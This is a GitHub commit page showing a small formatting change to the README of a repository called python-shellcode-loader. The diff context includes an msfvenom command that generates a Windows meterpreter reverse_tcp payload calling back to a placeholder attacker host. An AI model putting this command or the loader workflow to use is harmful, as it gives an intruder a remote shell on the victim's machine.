We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent d83b772 commit 84b104bCopy full SHA for 84b104b
README.md
@@ -8,7 +8,10 @@
8
git clone https://github.com/HZzz2/python-shellcode-loader.git <br />cd python-shellcode-loader
9
<a name="CuRMC"></a>
10
11
+git clone https://github.com/HZzz2/python-shellcode-loader.git
12
+cd python-shellcode-loader
13
pip install -r .\requirements.txt
14
+
15
## 生成shellcode
16
#生成shellcode<br />`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw`
17
<a name="rNUTI"></a>
0 commit comments